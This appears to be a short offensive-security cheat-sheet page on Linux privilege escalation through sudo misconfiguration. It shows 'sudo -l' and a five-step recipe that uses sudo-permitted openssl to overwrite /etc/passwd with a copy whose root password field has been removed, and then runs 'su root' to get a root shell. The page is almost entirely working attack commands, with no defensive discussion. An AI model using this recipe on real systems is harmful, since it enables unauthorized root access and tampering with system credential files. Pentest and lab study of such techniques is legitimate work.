githubEdit

Sudo-rights abuse

Check sudo permission

sudo -l

Openssl sudo exploit

If openssl is allowed to run as sudo

  1. cp /etc/passwd ~/passwd.bak

  2. Edit the file to remove root:X: from root line

  3. sudo openssl enc -aes-256-cbc -e -in ~/passwd.bak -out /tmp/passwd.enc

  4. sudo openssl enc -aes-256-cbc -d -in /tmp/passwd.enc -out /etc/passwd

  5. su root

Last updated